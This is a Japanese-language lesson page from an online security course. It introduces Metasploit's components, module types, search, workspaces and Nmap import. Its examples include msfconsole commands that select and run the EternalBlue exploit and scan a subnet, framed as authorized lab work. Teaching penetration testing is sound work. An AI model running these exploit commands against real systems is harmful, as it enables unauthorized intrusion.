0Pricing
Cyber Security Academy · レッスン

Metasploitのアーキテクチャとmsfconsole

msfconsoleを操作し、exploit、payload、moduleの構造を理解してオプションを設定します。

「Metasploitのアーキテクチャとmsfconsole」はCoddyKit上の無料Cyber Security Academyレッスンです。 これはレッスン1/4です。 下記で完全なレッスンを無料で読むことができます。その後、ブラウザ内の組み込みコードエディタと24時間対応のAIチューターでハンズオン演習できます。 これはCyber Security Academy学習パスの一部であり、ウェブとCoddyKitアプリ全体で進捗が同期されます。 Cyber Security Academyコースには全4レッスンが含まれています。

Metasploitとは

Metasploit Frameworkは、エクスプロイトの開発、テスト、実行を統一されたインターフェースで行えるオープンソースのペネトレーションテストプラットフォームです。認可されたラボ環境でのエクスプロイトにおける業界標準のツールです。

Metasploitのコンポーネント

主なコンポーネントは、msfconsole(対話型CLI)、msfvenom(ペイロード生成ツール)、Metasploit DB(ホストやセッションを保存するPostgreSQL)、Armitage(GUIフロントエンド)です。

msfconsoleの起動

msfconsoleを起動してデータベースを初期化します。プロンプトがmsf6 >に変わります。すべてのコマンド、モジュール名、オプションでタブ補完を使用できます。

# Start msfconsole
msfconsole

# Initialize database (if needed)
msfdb init
msfdb start

# Check DB connection
msf6 > db_status
# [*] Connected to msf. Connection type: postgresql.

モジュールの種類

Metasploitでは、機能を次のモジュールタイプに分類しています。exploit(脆弱性固有の攻撃コード)、payload(エクスプロイト後に実行されるコード)、auxiliary(スキャナーやファザー)、post(ポストエクスプロイト)、encoder、nopです。

msf6 > show exploits       # list exploit modules
msf6 > show auxiliary      # list auxiliary modules
msf6 > show payloads       # list payloads
msf6 > show post           # post-exploitation modules

モジュールの検索

searchコマンドでは、名前、CVE、プラットフォーム、ランクによってモジュールを絞り込めます。モジュールのランクは信頼性を示します。Excellent > Great > Good > Normal > Average > Lowの順です。

msf6 > search type:exploit name:eternalblue
msf6 > search cve:2021-44228
msf6 > search platform:windows smb
msf6 > search rank:excellent ms17

エクスプロイトモジュールの使用

useでモジュールを選択し、show optionsで必須オプションを確認し、setで値を設定して、runまたはexploitで実行します。

msf6 > use exploit/windows/smb/ms17_010_eternalblue
msf6 exploit(ms17_010_eternalblue) > show options
msf6 exploit(ms17_010_eternalblue) > set RHOSTS 192.168.1.100
msf6 exploit(ms17_010_eternalblue) > set LHOST 192.168.1.10
msf6 exploit(ms17_010_eternalblue) > run

グローバルオプションの設定

setgは、それ以降のすべてのモジュールに対してオプションをグローバルに設定します。エンゲージメント全体を通じて変わらないLHOST、LPORT、RHOSTSなどに便利です。

msf6 > setg LHOST 192.168.1.10
msf6 > setg LPORT 4444

# Unset global
msf6 > unsetg LHOST

Auxiliaryモジュール

Auxiliaryモジュールは、ペイロードを配信せずにスキャン、列挙、ファジングを実行します。例として、SMBバージョンスキャナー、SSHログインのブルートフォース、HTTPディレクトリスキャナーがあります。

msf6 > use auxiliary/scanner/smb/smb_version
msf6 auxiliary(smb_version) > set RHOSTS 192.168.1.0/24
msf6 auxiliary(smb_version) > set THREADS 10
msf6 auxiliary(smb_version) > run

ワークスペースの管理

ワークスペースを使用すると、エンゲージメントごとにスキャンデータとセッションを整理できます。データを分離して管理できるよう、各アセスメントの開始時に新しいワークスペースを作成します。

msf6 > workspace                 # list workspaces
msf6 > workspace -a lab_test     # create
msf6 > workspace lab_test        # switch
msf6 > hosts                     # show discovered hosts
msf6 > services                  # show discovered services

Nmapとの連携

NmapのXMLスキャン結果をMetasploitのデータベースに直接インポートすると、ホストテーブルとサービステーブルにデータが登録され、対象を絞ったモジュール選択が可能になります。

msf6 > db_nmap -sV 192.168.1.0/24
# Or import existing XML:
msf6 > db_import /path/to/scan.xml
msf6 > hosts
msf6 > services -p 445

ヘルプとドキュメント

すべてのモジュールには組み込みのドキュメントがあります。infoを使用すると、モジュールの説明、信頼性評価、参照情報(CVEやアドバイザリ)、必須オプションを確認できます。

msf6 > use exploit/windows/smb/ms17_010_eternalblue
msf6 > info

# Shows: description, CVE references,
# platform, architecture, reliability rank

確認問題

msfconsoleでモジュールを選択するコマンドはどれですか。

まとめ:Metasploitのアーキテクチャ

msfconsoleは中心的なハブです。モジュールを検索し、オプションを設定し、エクスプロイトを実行し、セッションを管理します。必ず名前付きのワークスペース内で作業し、Nmapの結果をインポートしてデータベースに登録し、実行前にモジュールの情報を確認してください。何をなぜ実行するのかを理解することが重要です。

よくある質問

「Metasploitのアーキテクチャとmsfconsole」レッスンは無料ですか?

はい。「Metasploitのアーキテクチャとmsfconsole」の完全なテキストはこのウェブで無料で読めます。インタラクティブに演習し(組み込みコードエディタと24時間対応のAIチューター)、Cyber Security Academyコースの残りをアンロックするには、CoddyKit PROにアップグレードしてください。 Cyber Security Academyコースには全4レッスンが含まれています。

「Metasploitのアーキテクチャとmsfconsole」で何を学びますか?

msfconsoleを操作し、exploit、payload、moduleの構造を理解してオプションを設定します。 ブラウザで直接実行するハンズオンコードでCyber Security Academyを演習し、24時間対応のAIチューターがレッスンを進める中での質問に答えます。

Cyber Security Academyを始めるのに経験は必要ですか?

事前経験は必要ありません。CoddyKitのCyber Security Academyは初級者から上級者向けに構成されているため、ここから始めるか最初から始めて、自分のペースで進むことができます。 これはレッスン1/4です。

「Metasploitのアーキテクチャとmsfconsole」レッスンにはどのくらい時間がかかりますか?

ほとんどのCoddyKitレッスンは約5~10分かかります。各レッスンはコンパクトでインタラクティブなので、着実に進歩し、ウェブとアプリ全体で正確に前回の場所から再開できます。

このCyber Security Academyレッスンでコードを書いて実行できますか?

はい。すべてのCyber Security Academyレッスンに組み込みコードエディタが含まれているため、ブラウザでリアルコードを書いて実行し、即座のAIフィードバックを取得できます。ローカル設定は不要です。

このコースのすべてのレッスン

  1. Metasploitのアーキテクチャとmsfconsole
  2. 既知の脆弱性の悪用
  3. Payload:stagedとstageless、Meterpreter
  4. 侵入後の操作:PivotとPersist
← Cyber Security Academyに戻る